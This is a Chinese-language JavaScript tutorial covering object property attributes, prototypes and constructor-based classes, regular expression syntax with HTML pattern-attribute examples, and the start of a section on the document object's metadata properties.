Object对象的propertyIsEnumerable()方法可以判断此对象是否包含某个属性,并且这个属性是否可枚举。
for/in循环可以遍历对象中所有可枚举的对象属性(包括对象自有属性和继承的属性)。
Object.keys()方法会返回一个由一个给定对象的自身可枚举属性组成的数组。
Object.getOwnPropertyNames()方法会返回一个由一个给定对象的自身属性组成的数组,包括可枚举和不可枚举的。
chap3-22.js
var po={px:1,py:2};
var o={x:3,y:4};
o.__proto__=po; //设置o的原型为po
document.write("for/in方法输出结果:<br>");
for(property in o){
document.write(property+":"+o[property]+"<br>");
}
var propertyArray=Object.keys(o);
document.write("定义枚举属性前Object.keys方法输出结果:<br>");
for(var i=0;i<propertyArray.length;i++){
document.write(propertyArray[i]+"<br>");
}
Object.defineProperties(o,{
x:{enumerable:true},
y:{enumerable:false}
});
propertyArray=Object.keys(o);
document.write("定义枚举属性后Object.keys方法输出结果:<br>");
for(var i=0;i<propertyArray.length;i++){
document.write(propertyArray[i]+"<br>");
}
propertyArray=Object.getOwnPropertyNames(o);
document.write("定义枚举属性后Object.getOwnPropertyNames方法输出结果:<br>");
for(var i=0;i<propertyArray.length;i++){
document.write(propertyArray[i]+"<br>");
}
属性gettersetter
对象属性是由名字、值和一组特性(attribute)构成的。在ECMAScript 5中,属性值可以用一个或两个方法替代,这两个方法就是gettersetter。由gettersetter定义的属性称作“存取器属性”(accessorproperty),它不同于“数据属性”(data property)。
数据属性:包含属性的操作特性;如:设置值、是否可枚举等。
特性名称 描述 默认值
value 设置属性的值 undefined
writable 是否可修改属性的值;true:可修改属性的值;false:不可修改属性的值 false
enumerable 是否可枚举属性;true:可枚举,可通过for/in语句枚举属性;false:不可枚举 false
configurable 是否可修改属性的特性;true:可修改属性的特性(如把writablefalse改为true);false:不可修改属性的特性 false
存取器属性:包含属性的操作特性;如:设置值、是否可枚举等。
特性名称 描述 默认值
get 属性的返回值函数 undefined
set 属性的设置值函数;含有一个赋值参数 undefined
enumerable 是否可枚举属性;true:可枚举,可通过for/in语句枚举属性;false:不可枚举 false
configurable 是否可修改属性的特性;true:可修改属性的特性(如把writablefalse改为true);false:不可修改属性的特性 false
存取器也是可以继承的。
chap3-23.html
<script>
var obj={};
//添加一个属性,并设置为存取器属性
Object.defineProperty(obj,"name",{
get:function () {
return this._name; //get和set里的变量不要使用属性,如:属性为name,get和set用的是_name
},
set:function (x) {
if(isNaN(x)) //isNaN() 函数用于检查其参数是否是非数字值。
this._name=x;
else
this._name="name不能为纯数字";
},
enumerable:true,
configurable:true
});
obj.name="12";
document.write(obj.name+"<br>");
var o=inherit(obj); //存取器也是可以继承的
o.name="a12";
document.write(o.name+"<br>");
</script>
属性的特性
为了实现属性特性的查询和设置操作,ECMAScript 5中定义了一个名为“属性描述符”(property descriptor)的对象,这个对象代表数据属性特性和存取器属性特性。
在使用Object.definePropertyObject.definePropertiesObject.create函数的情况下添加数据属性,writableenumerableconfigurable默认值为false
使用对象直接量创建的属性,writableenumerableconfigurable特性默认为true
Object.getOwnPropertyDescriptor(object,propertyname)可用来获取描述属性特性的描述符对象。其中object为包含属性的对象,必需;propertyname为属性的名称,必需。
chap3-24.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-24</title>
</head>
<body style="font-size: xx-large">
<script>
var o1={name:"tom"};
document.write("对象直接量,属性特性默认为true<br>");
var desc=Object.getOwnPropertyDescriptor(o1,"name");
for(var prop in desc)
document.write(prop+":"+desc[prop]+"<br>");
var o2=Object.create(null,{
name:{value:"tom"}
});
document.write("通过Object.create创建,属性特性默认为false<br>")
desc=Object.getOwnPropertyDescriptor(o2,"name");
for(prop in desc)
document.write(prop+":"+desc[prop]+"<br>");
</script>
</body>
</html>
三个属性
原型属性
是用来继承属性的,指向另一个对象,本对象的属性继承自它的原型对象。
• 通过对象直接量创建的对象使用Object.prototype作为它们的原型;
• 通过new创建的对象使用构造函数的prototype属性来作为它们的原型;
• 通过Object.create()来创建的对象使用第一个参数作为它们的原型。
在ECMAScript5中将对象作为参数传入Object.getPrototypeOf()可查询它的原型;
想要检测一个对象是否是另一个对象的原型(或处于原型链中),使用isPrototypeOf()
var p={x:1,y:2};
var o=Object.create(p);
document.write(p.isPrototypeOf(o)+"<br>"); //返回true
document.write(Object.prototype.isPrototypeOf(o)); //返回true
类属性
是一个字符串,用以表示对象的类型信息。只能通过toString()这种间接的方法查询对象的类信息。该方法返回如下格式的字符串:[object class]
很多对象继承的toString方法被重写过,因此必须间接的调用Function.call()方法:
chap3-25.html
<script>
function classOf(o) {
if(o===null) return "null";
if(o===undefined) return "undefined";
return Object.prototype.toString.call(o).slice(8,-1);//提取返回字符串的第8个到倒数第二个位置之间的字符
}
document.write("null值类属性:"+classOf(null)+"<br>");
document.write("数组类属性:"+classOf(new Array())+"<br>");
document.write("对象类属性:"+classOf({})+"<br>");
document.write("字符串类属性:"+classOf("")+"<br>");
document.write("数值类属性:"+classOf(1)+"<br>");
document.write("布尔值类属性:"+classOf(true)+"<br>");
document.write("日期类属性:"+classOf(new Date())+"<br>");
document.write("正则表达式类属性:"+classOf(new RegExp())+"<br>");
document.write("客户端宿主对象类属性:"+classOf(window)+"<br>");
function f() {};
document.write("函数类属性:"+classOf(f)+"<br>");
document.write("函数对象类属性:"+classOf(new f())+"<br>");
</script>
可扩展属性
用以表示是否可以给对象添加新属性。所有内置对象和自定义对象都是显式可扩展的。
Object.isExtensible()判断对象是否是可扩展的。
Object.preventExtensions()可将对象转换为不可扩展的,一旦对象转换成不可扩展的了就不能转回可扩展的了。
类和模块
在JavaScript中也可以定义对象的类,让每个对象都共享某些属性,这种"共享"的特性是非常有用的。类的成员或实例都包含一些属性,用以存放它们的状态,其中有些属性定义了它们的行为(通常称为方法)。这些行为通常是由类定义的,而且为所有实例所共享。
在JavaScript中,类的实现是基于其原型继承机制的。如果两个实例都从一个原型对象上继承了属性,我们说它们是同一个类的实例。
JavaScript中类的一个重要特征是"动态可继承"(dynamically extendable),定义类是模块开发和重用代码的有效方式之一。
类和原型
在JavaScript中,类的所有实例对象都从一个类型对象上继承属性。因此,原型对象是类的核心。
在chap3.18中定义了inherit()函数,这个函数返回一个新创建的对象,然后继承自某个原型对象。如果定义了一个原型对象,然后通过inherit()函数创建了一个继承自它的对象,这样就定义了一个JavaScript类。通常,类的实例还需要进一步的初始化,通常是通过定义一个函数来创建并初始化这个新对象。
chap3-26.html
<head><script src="js/chap3.js"></script></head>
<script>
// range: 实现一个能表示值的范围的类
function range(from,to){
//使用inherit()函数来创建对象,这个对象继承自下面定义的原型对象
//原型对象作为函数的一个属性存储,并定义所有“范围对象”所共享的方法(行为)
var r = inherit(range.methods);
//储存新的“范围对象”启始位置和结束位置(状态)
//这两个属性是不可继承的,每个对象都拥有唯一的属性
r.from = from;
r.to = to;
//返回这个新创建的对象
return r;
}
//原型对象定义方法,这些方法为每个范围对象所继承
range.methods = {
//如果x在范围内,则返回true;否则返回false
//如果这个方法可以比较数字范围。也可以比较字符串和日期范围
includes:function(x){
return this.from <= x && x <= this.to;},
//对于范围内每个整数都调用一次f
//这个方法只可用作数字范围
foreach:function (f){
for (var x = Math.ceil(this.from); x <= this.to ; x++) f(x);
},
//返回表示这个范围的字符串
toString:function (){return "("+ this.from + "..." + this.to + ")";}
};
//这是使用范围对象的一些例子
var r =range(1,3); //创建一个范围对象
console.log(r.includes(2)); //true:2 在这个范围内
r.foreach(console.log);
console.log(r.toString());
</script>
这段代码定义了一个工厂方法range(),用来创建新的范围对象。我们注意到,这里给range()函数定义了一个属性range.methods,用以便捷地存放定义类的原型对象。
注意range()函数给每个范围对象定义了fromto属性,用以定义范围的起始位置和结束位置,这两个属性是非共享的,当然也是不可继承的。range.methods方法都用到了fromto属性,而且使用了this关键字,为了指代它们,二者使用this关键字来指代调用这个方法的对象。任何类的方法都可以通过this的这种基本用法来读取对象的属性。
类和构造函数
构造函数是用来初始化和创建对象的。使用new调用构造函数会创建一个新对象,因此,构造函数本身只需要初始化这个新对象的状态即可。调用构造函数的一个重要特征是,构造函数的prototype属性被用做新对象的原型。这意味着通过同一个构造函数创建的对象都是继承自一个相同的对象,因此它们都是一个类的成员。
chap3-27.html
<script>
//表示值的范围的类的另一种实现
//这是一个构造函数,用以初始化新创建的“范围对象”
//注意,这里并没有创建并返回一个对象,仅仅是初始化
function Range(from, to) {
//存储这个“范围对象”的起始位置和结束位置(状态)
//这两个属性是不可继承的,每个对象都拥有唯一的属性
this.from = from;
this.to = to;
}
//所有的“范围对象”都继承自这个对象
//属性的名字必须是"prototype"
Range.prototype = {
//如果x在范围内,则返回true;否则返回false
//这个方法可以比较数字范围,也可以比较字符串和日期范围
includes: function(x) {
return this.from <= x && x <= this.to;
},
//对于这个范围内的每个整数都调用一次f
//这个方法只可用于数字范围
foreach: function(f) {
for (var x = Math.ceil(this.from); x <= this.to; x++) f(x);
},
//返回表示这个范围的字符串
toString: function() {
return "(" + this.from + "..." + this.to + ")";
}
};
//这里是使用“范围对象”的一些例子
var r = new Range(1, 3); //创建一个范围对象
console.log(r.includes(2));
r.foreach(console.log);
console.log(r.toString());
</script>
一个常见的编程约定:从某种意义上来讲,定义构造函数即是定义类,并且类首字母要大写,而普通的函数和方法首字母都是小写。
Range()函数就是通过new关键字来调用的,构造函数会自动创建对象,然后将构造函数作为这个对象的方法来调用一次,最后返回这个新对象。
上面两个例子有一个非常重要的区别:就是原型对象的命名。在第一段示例代码中的原型是range.methods。这种命名方式很方便同时具有很好的语义,但有过于随意。在第二段代码中的原型是Range.prototype,这是一个强制命名。对Range()构造函数的调用会自动使用Range.prototype作为新Range对象的原型。
构造函数和类的标识
原型对象是类的唯一标识:当且仅当两个对象继承自同一个原型对象时,它们才是属于同一个类的实例。而初始化对象的状态的构造函数则不能作为类的标识,两个构造函数的prototype属性可能指向同一个原型对象。那么这两个构造函数创建的实例是属于一个类的。
尽管构造函数不像原型那样基础,但构造函数是类的"外在表现"。很明显,构造函数的名字通常用做类名。比如,我们说Range()构造函数创建Range对象,然而,更根本地讲,当使用instanceof运算符来检测对象是否属于某个类时会用到构造函数。假设这里有一个对象r,我们想知道r是否是Range对象,我们来这样写:
r instanceof Range // 如果r继承自Rang.prototype,则返回true
任何JavaScript函数都可以用做构造函数,并且调用构造函数是需要用到一个prototype属性,因此,每个JavaScript函数都自动拥有一个prototype属性。这个属性的值是一个对象,这个对象包含唯一一个不可枚举的属性constructorconstructor属性的值是一个函数对象:
var F = function() {}; //这是一个函数对象:
var p = F.prototype; //这是F相关联的原型对象
var c = p.constructor; //这是与原型相关的函数
c === F; //=>true 对于任意函数F.prototype.constructor == F
下图展示了构造函数和原型之间的关系,包括原型到构造函数的反向引用及构造函数创建的实例。
构造函数和原型之间的关系
注意:在上面的例子中,Range重新定义了prototype,所以创建对象的constructor属性将不再是Range(),而是直接使用Object.prototype.constructor,即Object()。我们可以通过补救措施来修正这个问题,显式的给原型添加一个构造函数:
Chap3-28.html
Range.prototype = {
constructor:Range, //显式的设置构造函数反向引用
includes: function(x) {
return this.from <= x && x <= this.to;
},
//对于这个范围内的每个整数都调用一次f
//这个方法只可用于数字范围
foreach: function(f) {
for (var x = Math.ceil(this.from); x <= this.to; x++) f(x);
},
//返回表示这个范围的字符串
toString: function() {
return "(" + this.from + "..." + this.to + ")";
}
};
另外一种常见的解决办法是使用预定义的原型对象,预定义的原型对象包含constructor属性,然后依次给原型对象添加方法:
Chap3-29.html
//扩展预定义的Range.prototype对象,而不重写之
//这样就自动创建Range.prototype.constructor属性
Range.prototype.includes=function(x){
return this.from <= x && x <= this.to;
};
//对于这个范围内的每个整数都调用一次f
//这个方法只可用于数字范围
Range.prototype.foreach = function(f) {
for (var x = Math.ceil(this.from); x <= this.to; x++) f(x);
};
//返回表示这个范围的字符串
Range.prototype.toString=function() {
return "(" + this.from + "..." + this.to + ")";
};
在JavaScript中定义类的步奏可以缩减为一个分三步的算法。
1. 先定义一个构造函数,并设置初始化新对象的实例属性。
2. 给构造函数的prototype对象定义实例的方法。
3. 给构造函数定义类字段和类属性。
Complex.js
/*这个文件定义了Complex类,用来描述复数。这个构造函数为它所创建的每个实例定义了实例字段r和i,分别保存复数的实部和虚部*/
function Complex(real, imaginary) {
this.r = real; // The real part of the complex number.
this.i = imaginary; // The imaginary part of the number.
}
/*类的实例方法定义为原型对象的函数值的属性
*这个库定义的方法可以被所有实例继承,并为它们提供共享的行为
*需要注意的是,javascript的实例方法必须使用关键字this才存取实例的字段*/
Complex.prototype.add = function(that) {
return new Complex(this.r + that.r, this.i + that.i);
};
Complex.prototype.equals = function(that) {
return that != null && // must be defined and non-null
that.constructor === Complex && // and an instance of Complex
this.r === that.r && this.i === that.i; // and have the same values.
};
Complex.prototype.toString = function() {
return "{" + this.r + "," + this.i + "}";
};
//类字段(比如常量)和类方法直接定义为构造函数的属性
//这里定义了一些对复数运算有帮助的类的字段,它们的命名全都是大写,用以表明它们是常量
Complex.ZERO = new Complex(0,0);
Complex.I = new Complex(0,1);
Chap3-30.htnl
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-30</title>
<script src="js/Complex.js"></script>
</head>
<body style="font-size: x-large">
<script>
var c = new Complex(2, 3); //使用构造函数创建新对象
var d = new Complex(c.i,c.r); //用到了c的实例属性
document.write(c.add(d).toString()+"<br>"); // {5,5}:使用了实例的方法
var e=new Complex(0,1);
document.write(e.equals(Complex.I));
</script>
</body>
</html>
类的扩充
JavaScript中基于原型的继承机制是动态的:对象从其原型继承属性,如果创建对象之后原型的属性发生改变,也会影响到继承这个原型的所有实例对象。这意味着我们可以通过给原型对象添加新的方法来扩充JavaScript类。
Chap3-31.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-31</title>
<script src="js/Complex.js"></script>
</head>
<body>
<script>
if(!Complex.prototype.mag){
//计算复数的模,复数的模的定义为原点(0,0)到复平面的距离
Complex.prototype.mag = function() {
return Math.sqrt(this.r*this.r + this.i*this.i);
};
}
var c = new Complex(2,3);
document.write(c.mag());
</script>
</body>
</html>
正则表达式的模式匹配
JavaScript中的正则表达式用RegExp对象表示,可以使用RegExp()构造函数来创建RegExp对象,不过RegExp对象更多是通过一种特殊的直接语法量来创建;就像通过引号包裹字符的方式来定义字符串常量一样,这种表达式直接量定义为包含在一堆斜杠(/)之间的字符。例如:
var pattern=/s$/; //用来匹配所有以字母“s”结尾的字符串
也可以用构造函数RegExp()来定义,例如:
var pattern1=new RegExp("s$");
正则表达式的模式规则是一个字符序列组成的。包括所有字母和数字在内,大多数的字符都是按照直接量仅描述待匹配的字符的。例如/java/可以匹配任何包含"java"子串的字符串。
直接量字符
正则表达式中所有字符和数字都是按照字面含义进行匹配的。javascript正则表达式语法也支持非字母的字符匹配,这些字符需要通过反斜线(\)作为前缀进行转义。
javascript正则表达式中的直接量字符:
字符 匹配
字母和数字字符 自身
\o NUL字符(\u0000)
\t 制表符(\u0009)
\n 换行符(\u000A)
\v 垂直制表符(\u000B)
\f 换页符(\u000C)
\r 回车符(\u000D)
\xnn 由十六进制数指定的拉丁字符,例如\x0A等价于\n
\uxxxx 由十六进制数xxxx指定的Unicode字符,例如\u0009等价于\t
字符类
将直接量字符单独放进方括号内就组成了字符类(character class)。一个字符类可以匹配它包含的任意字符。例如,/[abc]/就和字母“a”、“b”、“c”中的任意一个都匹配。
字符 匹配
[...] 方括号内的任意字符
[^...] 不在方括号内的任意字符
. 除换行符和其它Unicode行终止符之外的任意字符
\w 任何ASCII字符组成的单词,等价于[a-zA-Z0-9]
\W 任何不是ASCII字符组成的单词,等价于[^a-zA-Z0-9]
\s 任何Unicode空白符
\S 任何非Unicode空白符的字符
\d 任何ASCII数字,等价于[0-9]
\D 除了ASCII数字之外的任何字符,等价于[^0-9]
注意:在方括号之内也可以写成这些特殊转义字符。比如,由于\s匹配所有的空白字符,\d匹配的是所有数字,因此,/[\s\d]/就是匹配任意空白或数字。
Chap3-32.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-32</title>
<style type="text/css">
label{font-size: xx-large}
p>:invalid{outline: medium solid red}
p>:valid{outline: medium dotted green}
</style>
</head>
<body>
<p>
<label for="a">ASCII字符:</label>
<input type="text" id="a" pattern="\w">
</p>
<p>
<label for="b">ASCII数字:</label>
<input type="text" id="b" pattern="\d">
</p>
</body>
</html>
重复
字符 含义
{n,m} 匹配前一项至少n次,但不能超过m次
{n,} 匹配前一项n次或者更多次
{n} 匹配前一项n次
? 匹配前一项0次或1次,也就是说前一项是可选的,等价于{0,1}
+ 匹配前一项1次或多次,等价于{1,}
* 匹配前一项0次或多次,等价于{0,}
/\d{2,4}/ //匹配2~4个数字
/\w{3}\d?/ //精确匹配三个单词和一个可选的数字
/\s+java\s+/ //匹配前后带一个或多个空格的字符串“java”
/[^(]*/ //匹配1个或多个非左括号的字符
在使用*?时要注意,由于这些字符可能匹配0个字符,因此它们允许什么都不匹配。例如正则表达式/a*/实际上与字符串“bbbb”匹配,因为这个字符串含有0个a。
Chap3-33.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-33</title>
<style type="text/css">
label{font-size: xx-large}
p>:invalid{outline: medium solid red}
p>:valid{outline: medium dotted green}
</style>
</head>
<body>
<p>
<label for="a">匹配6~8个ASCII字符:</label>
<input type="text" id="a" pattern="\w{6,8}">
</p>
<p>
<label for="b">匹配3个ASCII字符和1个可选的ASCII数字:</label>
<input type="text" id="b" pattern="\w{3}\d?">
</p>
</body>
</html>
非贪婪的重复
上表中匹配重复字符是尽可能多地匹配,而且允许后继的正则表达式继续匹配。因此,我们称之为“贪婪的”匹配。
我们同样可以使用这种表达式进行“非贪婪”的匹配。只需在待匹配的字符后跟随一个问号即可:??+?*?{1,5}?。比如,正则表达式/a+/可以匹配一个或多个连续的字母a。当使用“aaa”作为匹配的字符串时,正则表达式会匹配它的三个字符。但是/a+?/也可以匹配一个或多个连续字母a,但它是尽可能少的匹配。我们同样将“aaa”作为匹配字符串,但最后一个模式只能匹配第一个a。
使用非贪婪的匹配模式所得到的结果可能和期望的并不一致。例如,/a+b/,当使用它来匹配“aaab”时,它会匹配了整个字符串。而/a+?b/,它匹配尽可能少的a和一个b,当它用来匹配“aaab”时,你期望它能匹配一个a和最后一个b。但实际上,这个模式却匹配了整个字符串。这是因为正则表达式的匹配模式总是会寻找字符串中第一个可能匹配的位置。由于该匹配是从字符串的第一个字符开始的,因此在这里不考虑它的子串中更短的匹配。
选择、分组和引用
正则表达式的语法还包括指定选择项、子表达式分组和引用前一子表达式的特殊字符。
字符 含义
` ` 选择,匹配的是该符号左边的子表达式或右边的子表达式
(...) 组合,将几个项组合成一个单元,这个单元可通过*+?和` `等符号加以修饰,而且可以记住和这个组合相匹配的字符串以供此后的引用使用
(?:...) 只组合,将项组合到一个单元,但不记忆与该组相匹配的字符
\n 和第n个分组第一次匹配的字符相匹配,组是圆括号中子表达式(也有可能是嵌套的),组索引是从左到右的左括号数,(?:形式的分组不编码
字符|用于分隔供选择的字符。例如:
/ab|cd|ef/ //可以匹配字符串"ab",也可以匹配字符串"cd",还可以匹配字符串"ef"
/\d{3}|[a-z]{4}/ //可以匹配三位数字或4个小写字母
注意:选择项的尝试匹配总是从左到右,直到发现了匹配项。如果左边的选择项匹配,就忽略右边的匹配项。即使它产生更好的匹配。因此,当正则表达式/a|ab/匹配字符串“ab”时,它只能匹配第一个字符。
正则表达式中的圆括号有多种作用。
一个作用是把单独的项组合成子表达式,以便可以像处理一个独立的单元那样用|*+或者?等来对单元内的项进行处理。例如:
/java(script)?/ //可以匹配字符串"java",其后可以有"script"也可以没有
/(ab|cd)+|ef/ //可以匹配字符串"ef",也可以匹配字符串"ab"或"cd"的一次或多次重复
Chap3-34.html
<body>
<p>
<label for="a">匹配"ab",或"cd",或"ef":</label>
<input type="text" id="a" pattern="ab|cd|ef">
</p>
<p>
<label for="b">匹配三位数字或4个小写字母:</label>
<input type="text" id="b" pattern="\d{3}|[a-z]{4}">
</p>
<p>
<label for="b">匹配字符串"java",或"javascript":</label>
<input type="text" id="b" pattern="java(script)?">
</p>
<p>
<label for="a">匹配"ef",或匹配字符串"ab"或"cd"的一次或多次重复:</label>
<input type="text" id="a" pattern="(ab|cd)+|ef">
</p>
</body>
另一个作用是允许在同一正则表达式的后部引用前面的子表达式。这是通过在字符\后加一位数字来实现的。这个数字指定了带圆括号的子表达式在正则表达式中的位置。例如:
/([Jj]ava([Ss]cript)?)\sis\s(fun\w*)/ //嵌套的子表达式([Ss]cript)可以用\2来指代
注意:因为子表达式可以嵌套另一个子表达式,所以它的位置是参与计数的左括号的位置。
/['"][^'"]*['"]/ //匹配的就是位于单引号或双引号之内的0个或多个字符。
/(['"])[^'"]*\1/ //与上面的正则表达式等价
在正则表达式中不用创建带数字编码的引用,也可以对子表达式进行分组。它是以(?:...)来进行分组。例如:
//这种改进的圆括号并不生成引用。所以在这个表达式中,\2引用了与(fun\W*)匹配的文本。
/([Jj]ava(?:[Ss]cript)?)\sis\s(fun\w*)/
指定匹配位置
正则表达式中的锚字符:
字符 含义
^ 匹配字符串的开头,在多行检索中,匹配一行的开头
$ 匹配字符串的结尾,在多行检索中,匹配一行的结尾
\b 匹配一个单词的边界,简而言之,就是位于字符\w\W之间的位置,或位于字符\w和字符串开头或者结尾之间的位置。(但需要注意,[\b]匹配的是退格符)
\B 匹配非单词边界的位置
(?=p) 零宽正向先行断言,要求接下来的字符都与p匹配,但不能包括匹配p的那些字符
(?!p) 零宽负向先行断言,要求接下来的字符不与p匹配
最常用的锚元素是^,它用来匹配字符串的开始,锚元素$用来匹配字符串的结束。例如:
/^JavaScript$/ //要匹配单词“JavaScript”
如果想匹配“Java”这个单词本身,可以使用/\sJava\s/,可以匹配前后都有空格的单词"Java"。但是这样做有两个问题,第一。如果“Java”出现在字符串的开始或者结尾,就匹配不成功,除非开始和结尾处各有一个空格。第二个问题是,当找到了与之匹配的字符串时,它返回的匹配字符串的前端和后端都有空格。因此,我们使用单词的边界\b来代替真正的空格符\s进行匹配(或定位)。这样的正则表达式就写成了/\bJava\b/
元素\B把匹配的锚点定位在不是单词的边界之处。因此,正则表达式/\B[Ss]cript/与“JavaScript”和“postscript”匹配,但不与“script”和“Scripting”匹配。
任意正则表达式都可以作为锚点条件。如果在符号(?=)之间加入一个表达式,它就是一个先行断言,用以说明圆括号内的表达式必须正确匹配,但不是真正意义上的匹配,可以使用/[Jj]ava([Ss]cript)?(?=\:)/。这个正则表达式可以匹配“Jvascript: The Definitive Guide”中的“javascript”,但不能匹配“Java in NutShell”中的“Java”,因为它后面没有冒号。
带有(?!的断言是负向先行断言,用以指定接下来的字符都不必匹配。例如:/Java(?!Script)([A-Z]\w*)/可以匹配“Java”后跟随一个大写字母和任意多个ASCII单词,但“Java”后面不能跟随“Script”。它可以匹配“JavaBeans”,但不能匹配“Javabeans”。
Chap3-35.html
<head><style type="text/css">
label{font-size: xx-large}
p>:invalid{outline: medium solid red}
p>:valid{outline: medium dotted green}
</style></head>
<body>
<p>
<label for="a">匹配位于单引号之内的0个或多个字符:</label>
<input type="text" id="a" pattern="(['])[^']*\1">
</p>
<p>
<label for="a">要匹配单词“JavaScript”:</label>
<input type="text" id="a" pattern="^JavaScript$">
</p>
<p>
<label for="a">要匹配前后都有空格的单词“Java”:</label>
<input type="text" id="a" pattern="\sJava\s">
</p>
<p>
<label for="a">要匹配单词“Java”:</label>
<input type="text" id="a" pattern="\bJava\b">
</p>
</body>
修饰符
和之前讨论的正则表达式语法不同,修饰符是放在/符号之外的。Javascript支持三个修饰符:
字符 含义
i 执行不区分大小写的匹配
g 执行一个全局匹配,简言之,即找到所有的匹配,而不是在找到第一个之后就停止
m 多行匹配模式,^匹配一行的开头和字符串的开头,$匹配行的结束和字符串的结束
/java$/im //可以匹配java,也可以匹配"Java\nis Fun".
用于模式匹配的String方法
String支持4种使用正则表达式的方法:
• search():它的参数是一个正则表达式,返回第一个与之匹配的子串的位置,如果找不到匹配的子串,它将返回-1
document.write("javascript".search(/script/i)); //返回4
• replace():用于执行检索与替换操作。其中第一个参数是正则表达式,第二个参数是要进行替换的字符串。
var text="javascript and Javascript and javascript";
document.write(text.replace(/javascript/gi,"JavaScript"));
• match():它唯一的参数就是一个正则表达式,返回的是一个由匹配结果组成的数组。如果该正则表达式设置了修饰符g,则该方法返回的数组包含字符串中所有匹配的结果。
text="1 plus 2 equals 3";
var arr=text.match(/\d+/g);
• split():将调用它的字符串拆分为一个子串组成的数组,使用的分割符是split()的参数。
text="1, 2, 3, 4, 5";
var arr=text.split(/\s*,\S*/); //允许两边可以留任意多的空白符
RegExp对象
正则表达式是通过RegExp对象来表示的。 RegExp()构造函数带有两个字符串参数,其中第一个参数包含正则表达式的主体部分,需要注意的是,不论是字符串直接量还是正则表达式,都是用\字符作为转义字符的前缀。第二个参数是可选的,它指定正则表达式的修饰符。
//全局匹配字符串中的6个数字,注意这里使用了"\\",而不是“\”
var zipcode=new RegExp("\\d{6}","g");
RegExp对象的属性
• source属性:是一个只读的字符串,包含正则表达式的文本;
• global属性:是一个只读的布尔值,用以说明这个正则表达式是否带有修饰符g
• ignoreCase属性:是一个只读的布尔值,用以说明正则表达式是否带有修饰符i
• multiline属性:是一个只读的布尔值,用以说明正则表达式是否带有修饰符m
• lastIndex属性:是一个可读/写的整数,如果匹配模式带有g修饰符,这个属性存储在整个字符串中下一次检索的开始位置,这个属性会被exec()test()方法用到。
Chap3-36.html
<script>
document.write("javascript".search(/script/i)); //返回4
var text="javascript and Javascript and javascript";
document.write("<br>");
document.write(text.replace(/javascript/gi,"JavaScript"));
document.write("<br>");
text="1 plus 2 equals 3";
var arr=text.match(/\d+/g);
for(var i in arr)
document.write(arr[i]+"<br>");
text="1, 2, 3, 4, 5";
var arr=text.split(/\s*,\S*/); //允许两边可以留任意多的空白符
for(var i in arr)
document.write(arr[i]);
//全局匹配字符串中的6个数字,注意这里使用了"\\",而不是“\”
var zipcode=new RegExp("\\d{6}","g");
document.write("<br>");
document.write(zipcode.source+"<br>");
document.write(zipcode.global+"<br>");
</script>
RegExp对象的方法
exec()方法:用于检索字符串中的正则表达式的匹配。语法:
RegExpObject.exec(string)
• 如果exec()找到了匹配的文本,则返回一个结果数组。否则,返回null。此数组的第0个元素是与正则表达式相匹配的文本,第1个元素是与RegExpObject 的第1个子表达式相匹配的文本(如果有的话),第2个元素是与RegExpObject 的第2个子表达式相匹配的文本(如果有的话),以此类推。
• 在调用非全局RegExp对象的exec()方法时,返回的数组与调用方法String.match()返回的数组是相同的。
• RegExpObject是一个全局正则表达式时,它会在RegExpObjectlastIndex属性指定的字符处开始检索字符串string。当exec()找到了与表达式相匹配的文本时,在匹配后,它将把RegExpObjectlastIndex属性设置为匹配文本的最后一个字符的下一个位置。这就是说,您可以通过反复调用exec()方法来遍历字符串中的所有匹配文本。当exec()再也找不到匹配的文本时,它将返回null
注意:如果在一个字符串中完成了一次模式匹配之后要开始检索新的字符串,就必须手动地把lastIndex属性重置为0。
test()方法:用于检测一个字符串是否匹配某个模式。语法:
RegExpObject.test(string)
• 如果字符串string中含有与RegExpObject匹配的文本,则返回true,否则返回false
Chap3-37.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-37</title>
</head>
<body>
<script>
var str="Visit W3School";
var patt=new RegExp("W3School","g");
var result;
while ((result=patt.exec(str))!=null){
document.write(result+"<br>");
document.write(patt.lastIndex+"<br>");
}
var patt1=new RegExp("W3School");
var result=patt1.test(str);
document.write("Result: "+result+"<br>");
</script>
</body>
</html>
客户端JavaScript
• document对象
• Window对象
• 使用DOM元素
• 脚本化CSS
• 脚本化HTTP
• jQuery类库
• 客户端存储
• JSON
document对象
文档对象模型DOM把JavaScript和HTML文档的内容联系起来。通过使用DOM,可以添加、移除和操作各种元素,还可以使用事件(event)来响应用户的交互操作,以及完全控制CSS。
document对象是通往DOM功能的入口,它向你提供了当前文档的信息,以及一组可供探索、导航、搜索或操作结构与内容的功能。
问题 解决方案
获取文档信息 使用document元数据属性
获取文档位置信息 使用document.location属性
导航至某个新文档 修改Location对象的某个属性值
读取和写入cookie 使用document.cookie属性
判断浏览器处理文档的进展情况 使用document.readystate属性
获取浏览器已实现的DOM功能详情 使用document.implementation属性
获取代表特定元素类型的对象 使用document属性,如imageslinks
在文档中搜索元素 使用以document.getElement开头的各种方法
用CSS选择器在文档中搜索元素 使用document.querySelectordocument.querySelectorAll方法
合并进行链式搜索以寻找元素 对之前搜索的结果调用搜索方法
在DOM树中导航 使用文档/元素的方法与属性,如hasChildNodes()
使用document元数据
元数据属性 说明
characterSet 返回文档的字符集编码。只读
charset 获取或设置文档的字符集编码
compatMode 获取文档的兼容性模式
cookie 获取或设置当前文档的cookie
defaultCharset 获取浏览器所使用的默认字符编码
dir 获取或设置文档的文本方向
domain 获取或设置当前文档的域名
implementation 提供可用DOM功能的信息
lastModified 返回文档的最后修改时间(如果修改时间不可用则返回当前时间)
location 提供当前文档的URL信息
readyState 返回当前文档的状态。只读
referrer 返回链接到当前文档的文档URL
title 获取或设置当前文档的标题
Chap3-38.html
<head>
<meta charset="UTF-8">
<title>chap3-38</title>
<style type="text/css">
pre{font-size: xx-large}
</style>
</head>
<body>
<script>
document.dir="rtl";
document.writeln("<pre>");
document.writeln("characterSet:"+document.characterSet);
document.writeln("charset:"+document.charset);
document.writeln("compactMode:"+document.compatMode);
document.writeln("defaultCharset:"+document.defaultCharset);
document.writeln("dir:"+document.dir);
document.writeln("domain:"+document.domain);
document.writeln("lastModified:"+document.lastModified);
document.writeln("referrer:"+document.referrer);
document.writeln("title:"+document.title);
document.writeln("</pre>");
</script>
